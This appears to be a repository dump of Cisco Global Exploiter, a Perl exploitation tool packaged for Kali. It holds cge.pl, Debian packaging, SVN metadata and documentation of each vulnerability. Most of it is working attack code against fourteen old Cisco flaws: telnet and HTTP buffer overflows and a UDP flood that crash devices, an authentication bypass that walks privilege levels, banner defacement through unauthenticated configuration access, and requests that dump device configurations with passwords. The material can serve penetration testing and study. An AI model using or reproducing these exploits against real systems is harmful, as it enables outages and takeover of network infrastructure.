Repository layout:

```text
.
├── .svn
│   ├── entries
│   ├── prop-base
│   │   └── cge.pl.svn-base
│   └── text-base
│       ├── Readme.svn-base
│       └── cge.pl.svn-base
├── Readme
├── cge.pl
├── debian
│   ├── changelog
│   ├── cisco-global-exploiter.install
│   ├── compat
│   ├── control
│   ├── copyright
│   ├── docs
│   ├── rules
│   └── source
│       └── format
└── doc
    ├── .svn
    │   ├── entries
    │   └── text-base
    │       ├── Changelog.svn-base
    │       └── Documentation.svn-base
    ├── Changelog
    └── Documentation
```

/Readme (the pristine copy in .svn/text-base/Readme.svn-base is identical):

```text
##
# Cisco Global Exploiter
#
# Legal notes :
# The BlackAngels staff refuse all responsibilities
# for an incorrect or illegal use of this software
# or for eventual damages to other systems.
#
# http://www.blackangels.it
##

Project's maintainers :
Nemesis (nemesis[at]blackangels.it)
E4m (e4m[at]blackangels.it)

What is Cisco Global Exploiter :
Cisco Global Exploiter (CGE) is an advanced, simple and fast security
testing tool that is able to exploit the most dangerous vulnerabilities
of Cisco systems.

How CGE works :
CGE has an intuitive and simple user interface and is run from the
command line with two parameters: the target and the number of the
vulnerability to exploit.

For more information or a detailed description of all vulnerabilities
and of their exploitation, read /doc/documentation.
```

/cge.pl (the pristine copy in .svn/text-base/cge.pl.svn-base is identical; `svn:executable` is set on it):

```perl
#!/usr/bin/perl

##
# Cisco Global Exploiter
#
# Legal notes :
# The BlackAngels staff refuse all responsibilities
# for an incorrect or illegal use of this software
# or for eventual damages to other systems.
#
# http://www.blackangels.it
##


##
# Modules
##

use Socket;
use IO::Socket;


##
# Main
##

# First argument: target host; second: vulnerability number from the list in usage().
$host = "";
$expvuln = "";
$host = $ARGV[0];
$expvuln = $ARGV[1];

if ($host eq "") {
    usage();
}
if ($expvuln eq "") {
    usage();
}
if ($expvuln eq "1") {
    cisco1();
}
elsif ($expvuln eq "2") {
    cisco2();
}
elsif ($expvuln eq "3") {
    cisco3();
}
elsif ($expvuln eq "4") {
    cisco4();
}
elsif ($expvuln eq "5") {
    cisco5();
}
elsif ($expvuln eq "6") {
    cisco6();
}
elsif ($expvuln eq "7") {
    cisco7();
}
elsif ($expvuln eq "8") {
    cisco8();
}
elsif ($expvuln eq "9") {
    cisco9();
}
elsif ($expvuln eq "10") {
    cisco10();
}
elsif ($expvuln eq "11") {
    cisco11();
}
elsif ($expvuln eq "12") {
    cisco12();
}
elsif ($expvuln eq "13") {
    cisco13();
}
elsif ($expvuln eq "14") {
    cisco14();
}
else {
    printf "\nInvalid vulnerability number ...\n\n";
    exit(1);
}


##
# Functions
##

sub usage
{
    printf "\nUsage :\n";
    printf "perl cge.pl <target> <vulnerability number>\n\n";
    printf "Vulnerabilities list :\n";
    printf "[1] - Cisco 677/678 Telnet Buffer Overflow Vulnerability\n";
    printf "[2] - Cisco IOS Router Denial of Service Vulnerability\n";
    printf "[3] - Cisco IOS HTTP Auth Vulnerability\n";
    printf "[4] - Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability\n";
    printf "[5] - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability\n";
    printf "[6] - Cisco 675 Web Administration Denial of Service Vulnerability\n";
    printf "[7] - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability\n";
    printf "[8] - Cisco IOS Software HTTP Request Denial of Service Vulnerability\n";
    printf "[9] - Cisco 514 UDP Flood Denial of Service Vulnerability\n";
    printf "[10] - CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability\n";
    printf "[11] - Cisco Catalyst Memory Leak Vulnerability\n";
    printf "[12] - Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability\n";
    printf "[13] - %u Encoding IDS Bypass Vulnerability (UTF)\n";
    printf "[14] - Cisco IOS HTTP Denial of Service Vulnerability\n";
    exit(1);
}

sub cisco1 # Cisco 677/678 Telnet Buffer Overflow Vulnerability
{
    my $serv = $host;
    my $dch = "?????????????????a~ %%%%%XX%%%%%";
    my $num = 30000;
    my $string .= $dch x $num;
    my $shc = "\015\012";

    my $sockd = IO::Socket::INET->new (
        Proto    => "tcp",
        PeerAddr => $serv,
        PeerPort => "(23)",
    ) || die("No telnet server detected on $serv ...\n\n");

    $sockd->autoflush(1);
    print $sockd "$string" . $shc;
    while (<$sockd>) { print }
    print("\nPacket sent ...\n");
    sleep(1);
    print("Now checking server's status ...\n");
    sleep(2);

    # A second connection attempt is the only "is it still up" check the tool makes.
    my $sockd2 = IO::Socket::INET->new (
        Proto    => "tcp",
        PeerAddr => $serv,
        PeerPort => "(23)",
    ) || die("Vulnerability successful exploited. Target server is down ...\n\n");

    print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n");
    close($sockd2);
    exit(1);
}

sub cisco2 # Cisco IOS Router Denial of Service Vulnerability
{
    my $serv = $host;

    my $sockd = IO::Socket::INET->new (
        Proto    => "tcp",
        PeerAddr => $serv,
        PeerPort => "http(80)",);
    unless ($sockd) { die "No http server detected on $serv ...\n\n" };
    $sockd->autoflush(1);
    print $sockd "GET /\%\% HTTP/1.0\n\n";
    -close $sockd;
    print "Packet sent ...\n";
    sleep(1);
    print("Now checking server's status ...\n");
    sleep(2);

    my $sockd2 = IO::Socket::INET->new (
        Proto    => "tcp",
        PeerAddr => $serv,
        PeerPort => "http(80)",);
    unless ($sockd2) { die "Vulnerability successful exploited. Target server is down ...\n\n" };

    print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n");
    close($sockd2);
    exit(1);
}

sub cisco3 # Cisco IOS HTTP Auth Vulnerability
{
    my $serv = $host;
    my $n = 16;
    my $port = 80;
    my $target = inet_aton($serv);
    my $fg = 0;

    # Walks privilege levels 16..99 and stops at the first one not answered 401.
    LAB: while ($n < 100) {
        my @results = exploit("GET /level/" . $n . "/exec/- HTTP/1.0\r\n\r\n");
        $n++;
        foreach $line (@results) {
            $line =~ tr/A-Z/a-z/;
            if ($line =~ /http\/1\.0 401 unauthorized/) { $fg = 1; }
            if ($line =~ /http\/1\.0 200 ok/) { $fg = 0; }
        }

        if ($fg == 1) {
            sleep(2);
            print "Vulnerability unsuccessful exploited ...\n\n";
        }
        else {
            sleep(2);
            print "\nVulnerability successful exploited with [http://$serv/level/$n/exec/....] ...\n\n";
            last LAB;
        }

        sub exploit {
            my ($pstr) = @_;
            socket(S, PF_INET, SOCK_STREAM, getprotobyname('tcp') || 0) ||
                die("Unable to initialize socket ...\n\n");
            if (connect(S, pack "SnA4x8", 2, $port, $target)) {
                my @in;
                select(S);
                $| = 1;
                print $pstr;
                while (<S>) { push @in, $_; }
                select(STDOUT); close(S); return @in;
            }
            else { die("No http server detected on $serv ...\n\n"); }
        }
    }
    exit(1);
}

sub cisco4 # Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability
{
    my $serv = $host;
    my $n = 16;

    while ($n < 100) {
        exploit1("GET /level/$n/exec/- HTTP/1.0\n\n");
        $wr =~ s/\n//g;
        if ($wr =~ /200 ok/) {
            while (1)
            {
                print "\nVulnerability could be successful exploited. Please choose a type of attack :\n";
                print "[1] Banner change\n";
                print "[2] List vty 0 4 acl info\n";
                print "[3] Other\n";
                print "Enter a valid option [ 1 - 2 - 3 ] : ";
                $vuln = <STDIN>;
                chomp($vuln);

                if ($vuln == 1) {
                    print "\nEnter deface line : ";
                    $vuln = <STDIN>;
                    chomp($vuln);
                    exploit1("GET /level/$n/exec/-/configure/-/banner/motd/$vuln HTTP/1.0\n\n");
                }
                elsif ($vuln == 2) {
                    exploit1("GET /level/$n/exec/show%20conf HTTP/1.0\n\n");
                    print "$wrf";
                }
                elsif ($vuln == 3)
                {
                    print "\nEnter attack URL : ";
                    $vuln = <STDIN>;
                    chomp($vuln);
                    exploit1("GET /$vuln HTTP/1.0\n\n");
                    print "$wrf";
                }
            }
        }
        $wr = "";
        $n++;
    }
    die "Vulnerability unsuccessful exploited ...\n\n";

    # Sends one request and accumulates the whole response in the globals $wr / $wrf.
    sub exploit1 {
        my $sockd = IO::Socket::INET->new (
            Proto    => 'tcp',
            PeerAddr => $serv,
            PeerPort => 80,
            Type     => SOCK_STREAM,
            Timeout  => 5);
        unless ($sockd) { die "No http server detected on $serv ...\n\n" }
        $sockd->autoflush(1);
        $sockd->send($_[0]);
        while (<$sockd>) { $wr .= $_ } $wrf = $wr;
        close $sockd;
    }
    exit(1);
}

sub cisco5 # Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability
{
    my $serv = $host;
    my $port = 22;
    my $vuln = "a%a%a%a%a%a%a%";

    my $sockd = IO::Socket::INET->new (
        PeerAddr => $serv,
        PeerPort => $port,
        Proto    => "tcp")
        || die "No ssh server detected on $serv ...\n\n";

    print "Packet sent ...\n";
    print $sockd "$vuln";
    close($sockd);
    exit(1);
}

sub cisco6 # Cisco 675 Web Administration Denial of Service Vulnerability
{
    my $serv = $host;
    my $port = 80;
    my $vuln = "GET ? HTTP/1.0\n\n";

    my $sockd = IO::Socket::INET->new (
        PeerAddr => $serv,
        PeerPort => $port,
        Proto    => "tcp")
        || die "No http server detected on $serv ...\n\n";

    print "Packet sent ...\n";
    print $sockd "$vuln";
    sleep(2);
    print "\nServer response :\n\n";
    close($sockd);
    exit(1);
}

sub cisco7 # Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability
{
    my $serv = $host;
    my $port = 80;
    my $k = "";

    print "Enter a file to read [ /show/config/cr set as default ] : ";
    $k = <STDIN>;
    chomp($k);
    if ($k eq "")
        { $vuln = "GET /exec/show/config/cr HTTP/1.0\n\n"; }
    else
        { $vuln = "GET /exec$k HTTP/1.0\n\n"; }

    my $sockd = IO::Socket::INET->new (
        PeerAddr => $serv,
        PeerPort => $port,
        Proto    => "tcp")
        || die "No http server detected on $serv ...\n\n";

    print "Packet sent ...\n";
    print $sockd "$vuln";
    sleep(2);
    print "\nServer response :\n\n";
    while (<$sockd>) { print }
    close($sockd);
    exit(1);
}

sub cisco8 # Cisco IOS Software HTTP Request Denial of Service Vulnerability
{
    my $serv = $host;
    my $port = 80;
    my $vuln = "GET /error?/ HTTP/1.0\n\n";

    my $sockd = IO::Socket::INET->new (
        PeerAddr => $serv,
        PeerPort => $port,
        Proto    => "tcp")
        || die "No http server detected on $serv ...\n\n";

    print "Packet sent ...\n";
    print $sockd "$vuln";
    sleep(2);
    print "\nServer response :\n\n";
    while (<$sockd>) { print }
    close($sockd);
    exit(1);
}

sub cisco9 # Cisco 514 UDP Flood Denial of Service Vulnerability
{
    my $ip = $host;
    my $port = "514";
    my $ports = "";
    my $size = "";
    my $i = "";
    my $string = "%%%%%XX%%%%%";

    print "Input packets size : ";
    $size = <STDIN>;
    chomp($size);

    socket(SS, PF_INET, SOCK_DGRAM, 17);
    my $iaddr = inet_aton("$ip");

    for ($i = 0; $i < 10000; $i++)
        { send(SS, $string, $size, sockaddr_in($port, $iaddr)); }

    printf "\nPackets sent ...\n";
    sleep(2);
    printf "Please enter a server's open port : ";
    $ports = <STDIN>;
    chomp $ports;
    printf "\nNow checking server status ...\n";
    sleep(2);

    socket(SO, PF_INET, SOCK_STREAM, getprotobyname('tcp')) || die "An error occurred while loading socket ...\n\n";
    my $dest = sockaddr_in($ports, inet_aton($ip));
    connect(SO, $dest) || die "Vulnerability successful exploited. Target server is down ...\n\n";

    printf "Vulnerability unsuccessful exploited. Target server is still up ...\n\n";
    exit(1);
}

sub cisco10 # CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability
{
    my $ip = $host;
    my $vln = "%%%%%XX%%%%%";
    my $num = 30000;
    my $string .= $vln x $num;
    my $shc = "\015\012";

    my $sockd = IO::Socket::INET->new (
        Proto    => "tcp",
        PeerAddr => $ip,
        PeerPort => "(2002)",
    ) || die "Unable to connect to $ip:2002 ...\n\n";

    $sockd->autoflush(1);
    print $sockd "$string" . $shc;
    while (<$sockd>) { print }
    print "Packet sent ...\n";
    close($sockd);
    sleep(1);
    print("Now checking server's status ...\n");
    sleep(2);

    my $sockd2 = IO::Socket::INET->new (
        Proto    => "tcp",
        PeerAddr => $ip,
        PeerPort => "(2002)",);
    unless ($sockd) { die "Vulnerability successful exploited. Target server is down ...\n\n" };

    print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n");
    exit(1);
}

sub cisco11 # Cisco Catalyst Memory Leak Vulnerability
{
    my $serv = $host;
    my $rep = "";
    my $str = "AAA\n";

    print "\nInput the number of repetitions : ";
    $rep = <STDIN>;
    chomp $rep;

    my $sockd = IO::Socket::INET->new (
        PeerAddr => $serv,
        PeerPort => "(23)",
        Proto    => "tcp")
        || die "No telnet server detected on $serv ...\n\n";

    for ($k = 0; $k <= $rep; $k++) {
        print $sockd "$str";
        sleep(1);
        print $sockd "$str";
        sleep(1);
    }
    close($sockd);
    print "Packet sent ...\n";
    sleep(1);
    print("Now checking server's status ...\n");
    sleep(2);

    my $sockd2 = IO::Socket::INET->new (
        Proto    => "tcp",
        PeerAddr => $serv,
        PeerPort => "(23)",);
    unless ($sockd2) { die "Vulnerability successful exploited. Target server is down ...\n\n" };

    print "Vulnerability unsuccessful exploited. Target server is still up after $rep logins ...\n";
    close($sockd2);
    exit(1);
}

sub cisco12 # Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability
{
    my $serv = $host;
    my $l = 100;
    my $vuln = "";
    my $long = "A" x $l;

    my $sockd = IO::Socket::INET->new (
        PeerAddr => $serv,
        PeerPort => "(80)",
        Proto    => "tcp")
        || die "No http server detected on $serv ...\n\n";

    for ($k = 0; $k <= 50; $k++) {
        my $vuln = "GET " . $long . " HTTP/1.0\n\n";
        print $sockd "$vuln\n\n";
        sleep(1);
        $l = $l + 100;
    }

    close($sockd);
    print "Packet sent ...\n";
    sleep(1);
    print("Now checking server's status ...\n");
    sleep(2);

    my $sockd2 = IO::Socket::INET->new (
        Proto    => "tcp",
        PeerAddr => $serv,
        PeerPort => "http(80)",);
    unless ($sockd2) { die "Vulnerability successful exploited. Target server is down ...\n\n" };

    print "Target is not vulnerable. Server is still up after 5 kb of buffer ...\n";
    close($sockd2);
    exit(1);
}

sub cisco13 # %u Encoding IDS Bypass Vulnerability (UTF)
{
    my $serv = $host;
    my $vuln = "GET %u002F HTTP/1.0\n\n";

    my $sockd = IO::Socket::INET->new (
        PeerAddr => $serv,
        PeerPort => "(80)",
        Proto    => "tcp")
        || die "No http server detected on $serv ...\n\n";

    print "Packet sent ...\n";
    print $sockd "$vuln";
    close($sockd);
    sleep(1);
    print("Now checking server's status ...\n");
    print("Please verify if directory has been listed ...\n\n");
    print("Server response :\n");
    sleep(2);
    while (<$sockd>) { print }
    exit(1);
}

sub cisco14 # Cisco IOS HTTP server DoS Vulnerability
{
    my $serv = $host;
    my $vuln = "GET /TEST?/ HTTP/1.0";

    my $sockd = IO::Socket::INET->new (
        Proto    => "tcp",
        PeerAddr => $serv,
        PeerPort => "http(80)",);
    unless ($sockd) { die "No http server detected on $serv ...\n\n" };

    print $sockd "$vuln\n\n";
    print "Packet sent ...\n";
    close($sockd);
    sleep(1);
    print("Now checking server's status ...\n");
    sleep(2);

    my $sockd2 = IO::Socket::INET->new (
        Proto    => "tcp",
        PeerAddr => $serv,
        PeerPort => "http(80)",);
    unless ($sockd2) { die "Vulnerability successful exploited. Target server is down ...\n\n" };

    print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n");
    close($sockd2);
    exit(1);
}
```
Target server is still up ...\n\n"); 557 | close($sockd2); 558 | exit(1); 559 | } -------------------------------------------------------------------------------- /debian/changelog: -------------------------------------------------------------------------------- 1 | cisco-global-exploiter (13-1kali3) kali; urgency=low 2 | 3 | * Removed desktop files 4 | 5 | -- Mati Aharoni Fri, 14 Dec 2012 20:07:50 -0500 6 | 7 | cisco-global-exploiter (13-1kali2) kali; urgency=low 8 | 9 | * Updated desktop file 10 | 11 | -- Mati Aharoni Sat, 01 Dec 2012 08:49:42 -0500 12 | 13 | cisco-global-exploiter (13-1kali1) kali; urgency=low 14 | 15 | * Kali Version 16 | 17 | -- dookie Wed, 07 Nov 2012 10:58:56 -0700 18 | 19 | cisco-global-exploiter (13-1) kali; urgency=low 20 | 21 | * Initial release 22 | 23 | -- dookie Wed, 07 Nov 2012 10:44:53 -0700 24 | -------------------------------------------------------------------------------- /debian/cisco-global-exploiter.install: -------------------------------------------------------------------------------- 1 | cge.pl usr/bin/ 2 | -------------------------------------------------------------------------------- /debian/compat: -------------------------------------------------------------------------------- 1 | 8 2 | -------------------------------------------------------------------------------- /debian/control: -------------------------------------------------------------------------------- 1 | Source: cisco-global-exploiter 2 | Section: net 3 | Priority: extra 4 | Maintainer: dookie 5 | Build-Depends: debhelper (>= 8.0.0) 6 | Standards-Version: 3.9.3 7 | Homepage: http://www.blackangels.it 8 | Vcs-Git: ssh://git@git.kali.org/packages/cisco-global-exploiter.git 9 | Vcs-Browser: http://git.kali.org/gitweb/?p=packages/cisco-global-exploiter.git;a=summary 10 | 11 | Package: cisco-global-exploiter 12 | Architecture: all 13 | Depends: ${misc:Depends}, perl 14 | Description: Simple and fast Cisco exploitation tool 15 | Cisco Global Exploiter (CGE), is 
an advanced, simple 16 | and fast security testing tool. 17 | -------------------------------------------------------------------------------- /debian/copyright: -------------------------------------------------------------------------------- 1 | Format: http://www.debian.org/doc/packaging-manuals/copyright-format/1.0/ 2 | Upstream-Name: cisco-global-exploiter 3 | Source: http://www.blackangels.it 4 | 5 | Files: * 6 | Copyright: Nemesis 7 | E4m 8 | 9 | License: GPL-2+ 10 | This package is free software; you can redistribute it and/or modify 11 | it under the terms of the GNU General Public License as published by 12 | the Free Software Foundation; either version 2 of the License, or 13 | (at your option) any later version. 14 | . 15 | This package is distributed in the hope that it will be useful, 16 | but WITHOUT ANY WARRANTY; without even the implied warranty of 17 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 18 | GNU General Public License for more details. 19 | . 20 | You should have received a copy of the GNU General Public License 21 | along with this program. If not, see 22 | . 23 | On Debian systems, the complete text of the GNU General 24 | Public License version 2 can be found in "/usr/share/common-licenses/GPL-2". 25 | 26 | Files: debian/* 27 | Copyright: 2012 dookie 28 | License: GPL-2+ 29 | This package is free software; you can redistribute it and/or modify 30 | it under the terms of the GNU General Public License as published by 31 | the Free Software Foundation; either version 2 of the License, or 32 | (at your option) any later version. 33 | . 34 | This package is distributed in the hope that it will be useful, 35 | but WITHOUT ANY WARRANTY; without even the implied warranty of 36 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 37 | GNU General Public License for more details. 38 | . 39 | You should have received a copy of the GNU General Public License 40 | along with this program. If not, see 41 | . 
 On Debian systems, the complete text of the GNU General
 Public License version 2 can be found in "/usr/share/common-licenses/GPL-2".

--------------------------------------------------------------------------------
/debian/docs:
--------------------------------------------------------------------------------
Readme
doc/Documentation

--------------------------------------------------------------------------------
/debian/rules:
--------------------------------------------------------------------------------
#!/usr/bin/make -f
# -*- makefile -*-
# Sample debian/rules that uses debhelper.
# This file was originally written by Joey Hess and Craig Small.
# As a special exception, when this file is copied by dh-make into a
# dh-make output file, you may use that output file without restriction.
# This special exception was added by Craig Small in version 0.37 of dh-make.

# Uncomment this to turn on verbose mode.
#export DH_VERBOSE=1

%:
	dh $@
override_dh_auto_build:

override_dh_auto_install:

--------------------------------------------------------------------------------
/debian/source/format:
--------------------------------------------------------------------------------
3.0 (quilt)

--------------------------------------------------------------------------------
/doc/.svn/entries:
--------------------------------------------------------------------------------
10

dir
1733
svn+ssh://dookie@10.0.0.12/var/svn/backtrack/microverse/c/cisco-global-exploiter/source-cisco-global-exploiter-13-bt1/var/backtrack/sources/cisco-global-exploiter/13/bt1/upstream-sources/cisco-global-exploiter/doc
svn+ssh://dookie@10.0.0.12/var/svn/backtrack



2011-04-18T09:02:05.482722Z
327
emgent














d9273255-a111-4fa6-bf0a-919607b5ba98

Changelog
file




2011-08-26T04:17:59.610183Z
089e7bd729ccff89457377af6ef0c7fe
2011-04-18T09:02:05.482722Z
327
emgent





















1077

Documentation
file




2011-08-26T04:17:59.610183Z
4b7909e71663cea53ce69577b6a525d6
2011-04-18T09:02:05.482722Z
327
emgent





















19514


--------------------------------------------------------------------------------
/doc/.svn/text-base/Changelog.svn-base:
--------------------------------------------------------------------------------

Cisco Global Exploiter [ 13 Vulnerabilities ] - Released: 08/04/2004

+ Fixed a bug of Cisco IOS HTTP Auth Vulnerability exploit
+ Added CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability
+ Added Cisco Catalyst Memory Leak Vulnerability
+ Added Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability
+ Added %u Encoding IDS Bypass Vulnerability (UTF)
+ Added Cisco IOS HTTP Denial of Service Vulnerability
+ Added complete vulnerabilities documentation



Cisco Global Exploiter [ 8 Vulnerabilities ] - Released: 20/03/2003

+ Cisco 677/678 Telnet Buffer Overflow Vulnerability
+ Cisco IOS Router Denial of Service Vulnerability
+ Cisco IOS HTTP Auth Vulnerability
+ Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability
+ Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability
+ Cisco 675 Web Administration Denial of Service Vulnerability
+ Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability
+ Cisco IOS Software HTTP Request Denial of Service Vulnerability

--------------------------------------------------------------------------------
/doc/.svn/text-base/Documentation.svn-base:
--------------------------------------------------------------------------------

##
# Cisco Global Exploiter Documentation
# Vulnerabilities description and exploiting impact
#
# Legal notes :
# The BlackAngels staff refuse all responsibilities
# for an incorrect or illegal use of this document
# or for eventual damages to other systems.
#
# http://www.blackangels.it
##



[ Table of contents ]

1 - Cisco 677/678 Telnet Buffer Overflow Vulnerability
2 - Cisco IOS Router Denial of Service Vulnerability
3 - Cisco IOS HTTP Auth Vulnerability &
    Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability
4 - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability
5 - Cisco 675 Web Administration Denial of Service Vulnerability
6 - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability
7 - Cisco IOS Software HTTP Request Denial of Service Vulnerability
8 - CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability
9 - Cisco Catalyst Memory Leak Vulnerability
10 - Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability
11 - %u Encoding IDS Bypass Vulnerability (UTF)
12 - Cisco IOS HTTP Denial of Service Vulnerability



[1] Cisco 677/678 Telnet Buffer Overflow Vulnerability
======================================================

This vulnerability is identified in Cisco Broadband Operating System (CBOS),
an operating system for the Cisco 600 family of routers.
Each vulnerability can cause a Denial of Service by freezing the administrator
premises equipment (CPE).
The vulnerability can be exploited remotely.

All Cisco DSL CPE devices from the 600 family running CBOS software up to
and including the 2.4.4 release are vulnerable.
The complete list of vulnerable hardware models is :
626, 627, 633, 673, 675, 675e, 676, 677, 677i and 678.

By sending a large packet to the Telnet port it is possible to freeze the CPE.
It is not necessary to be logged in or to authenticate in any way.
Telnet is enabled by default.

By repeatedly exploiting these vulnerabilities an attacker can cause a Denial
of Service for an indeterminate period of time.


[2] Cisco IOS Router Denial of Service Vulnerability
====================================================

A defect in multiple releases of Cisco IOS software will cause a Cisco router
or switch to halt and reload if the IOS HTTP service is enabled and browsing
to "http:///%%" is attempted.
This defect can be exploited to produce a Denial of Service attack.

The vulnerability affects virtually all mainstream Cisco routers and switches
running Cisco IOS software releases 11.1 through 12.1, inclusive.
The vulnerability can be mitigated by disabling the IOS HTTP server, using an
access-list on an interface in the path to the router to prevent unauthorized
network connections to the HTTP server, or applying an access-class option directly
to the HTTP server itself.
The IOS HTTP server is enabled by default only on Cisco 1003, 1004, and 1005
routers that are not configured.
In all other cases, the IOS HTTP server must be explicitly enabled in order
to exploit this defect.
Cisco devices that may be running affected releases include :
Cisco routers in the AGS/MGS/CGS/AGS+, IGS, RSM, 800, ubr900, 1000, 2500, 2600,
3000, 3600, 3800, 4000, 4500, 4700, AS5200, AS5300, AS5800, 6400, 7000, 7200,
ubr7200, 7500, 12000 series, LS1010 ATM switch, Catalyst 6000, 2900XL, 3500XL
LAN switches and Cisco DistributedDirector.

Any affected Cisco IOS device that is operating with the HTTP server enabled
and is not protected against unauthorized connections can be forced to halt
for a period of up to two minutes and then reload.

The vulnerability can be exercised repeatedly, possibly creating a Denial
of Service attack, until such time as the HTTP server is disabled, the router
is protected against the attack, or the software on the router is upgraded to
an unaffected release of IOS.
In rare instances when a router at a remote location fails to reload, an
administrator must visit the physical device to recover from the defect.


[3] Cisco IOS HTTP Auth Vulnerability & Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability
==================================================================================================================

When the HTTP server is enabled and local authorization is used, it is possible,
under some circumstances, to bypass the authentication and execute any command
on the device.
In that case, the user will be able to exercise complete control over the device.
All commands will be executed with the highest privilege (level 15).

All releases of Cisco IOS software, starting with release 11.3 and later, are
vulnerable.
Virtually all mainstream Cisco routers and switches running Cisco IOS software
are affected by this vulnerability.
Products that are not running Cisco IOS software are not vulnerable.
Any device running Cisco IOS software release 11.3 and later is vulnerable.
Cisco devices that may be running with affected Cisco IOS software releases
include but are not limited to :
Cisco routers in the AGS/MGS/CGS/AGS+, IGS, RSM, 800, ubr900, 1000, 1400, 1500,
1600, 1700, 2500, 2600, 3000, 3600, 3800, 4000, 4500, 4700, AS5200, AS5300,
AS5800, 6400, 7000, 7100, 7200, ubr7200, 7500, 12000 series, LS1010 ATM switch,
Catalyst 6000, 5000, 2900XL, 3500XL, LAN switch and Cisco Distributed Director.

By sending a crafted URL it is possible to bypass authentication and execute any
command on the router at level 15 (enable level, the most privileged level).
This will happen only if the user is using a local database for authentication
(usernames and passwords are defined on the device itself).
The same URL will not be effective against every Cisco IOS software release and
hardware combination. However, there are only 84 different combinations to try,
so it would be easy for an attacker to test them all in a short period of time.
The URL in question follows this format :

http:///level/n/exec/....

where n is a number between 16 and 99.

An attacker can exercise complete control over the device.
By exploiting this vulnerability, the attacker can see and change the
configuration of the device.


[4] Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability
========================================================================

Non-Secure Shell (SSH) connection attempts to an enabled SSH service on a Cisco
Catalyst 6000, 5000, or 4000 switch might cause a "protocol mismatch" error,
resulting in a supervisor engine failure.
The supervisor engine failure causes the switch to fail to pass traffic and
reboots the switch.

Only the following images are affected :
cat4000-k9.6-1-1.bin, cat5000-sup3cvk9.6-1-1a.bin, cat5000-sup3k9.6-1-1.bin,
cat5000-supgk9.6-1-1.bin, cat6000-sup2cvk9.6-1-1a.bin, cat6000-sup2k9.6-1-1a.bin,
cat6000-supcvk9.6-1-1a.bin, cat6000-supk9.6-1-1a.bin, cat6000-sup2cvk9.6-1-1b.bin,
cat6000-sup2k9.6-1-1b.bin, cat6000-supcvk9.6-1-1b.bin and cat6000-supk9.6-1-1b.bin.

Non-SSH protocol connection attempts to the SSH service cause a "protocol mismatch"
error, which causes a switch to reload.
SSH is not enabled by default, and must be configured by the administrator.

This vulnerability enables a Denial of Service attack on the Catalyst switch.


[5] Cisco 675 Web Administration Denial of Service Vulnerability
================================================================

Any router in the Cisco 600 family that is configured to allow Web access can
be locked by sending a specific URL.
Web access is disabled by default, and it is usually enabled in order to
facilitate remote configuration.

The affected models are :
627, 633, 673, 675, 675E, 677, 677i and 678.
These models are vulnerable if they run any of the following, or earlier,
CBOS releases:
2.0.1, 2.1.0, 2.1.0a, 2.2.0, 2.2.1, 2.2.1a, 2.3, 2.3.2, 2.3.5, 2.3.7 and 2.3.8.

The behavior is caused by inadequate URL parsing in CBOS.
Each URL was expected to terminate with a minimum of a single space character
(ASCII code 32, decimal).
Sending a URL that does not terminate with a space causes CBOS to enter an
infinite loop.
It is necessary to power cycle the router to resume operation.
To exploit this vulnerability, a router must be configured to accept Web connections.
Having a Web access password configured does not provide protection against this
vulnerability.

By sending a tailored URL to a router, it is possible to cause a Denial of Service.
Every affected router must be powered off and back on in order to restore its normal
functionality.


[6] Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability
=================================================================

The Catalyst 3500 XL series switches' web configuration interface lets any user
execute any command on the system without logging in.

Affected systems are :
Cisco Catalyst 3500 XL series switches and all switches that use similar
software.

Cisco Catalyst 3500 XL series switches have a webserver configuration interface.
This interface lets any anonymous web user execute any command without supplying
any authentication credentials by simply requesting the "/exec" location from the
webserver.
An example follows :

http://target/exec/show/config/cr

This URL will show the configuration file, with all user passwords.


[7] Cisco IOS Software HTTP Request Denial of Service Vulnerability
===================================================================

A defect in multiple releases of Cisco IOS software will cause a Cisco router or
switch to halt and reload if the IOS HTTP service is enabled, browsing to
"http://target/anytext?/" is attempted, and the enable password is supplied
when requested.
This defect can be exploited to produce a Denial of Service attack.

Cisco devices that may be running with affected IOS software releases include :
Cisco routers in the AGS/MGS/CGS/AGS+, IGS, RSM, 800, ubr900, 1000, 1400, 1500,
1600, 1700, 2500, 2600, 3000, 3600, 3800, 4000, 4500, 4700, AS5200, AS5300, AS5800,
6400, 7000, 7200, ubr7200, 7500, 12000 series, LS1010 ATM switch, Catalyst 6000,
2900XL, LAN switch 1900, 2800, 2900, 3000, and 5000 and Cisco Distributed Director.

The HTTP server was introduced in IOS release 11.0 to extend router management to
the World Wide Web.
The "?" (question mark) character is defined in the HTML specifications as a
delimiter for CGI arguments.
It is also interpreted by the IOS command-line interface as a request for help.
As of Cisco IOS Software Release 12.0T, the meaning of a question mark when it
appears adjacent to a "/" (slash) character cannot be determined properly by the
URI parser in affected versions of Cisco IOS software.
When a URI containing "?/" is presented to the HTTP service on the router and a
valid enable password is supplied, the router enters an infinite loop.
A watchdog timer expires two minutes later and forces the router to crash and reload.
The router continues to be vulnerable to this defect as long as it is running an
affected IOS software release and the enable password is known.
This vulnerability may only be exploited if the enable password is not set, it is
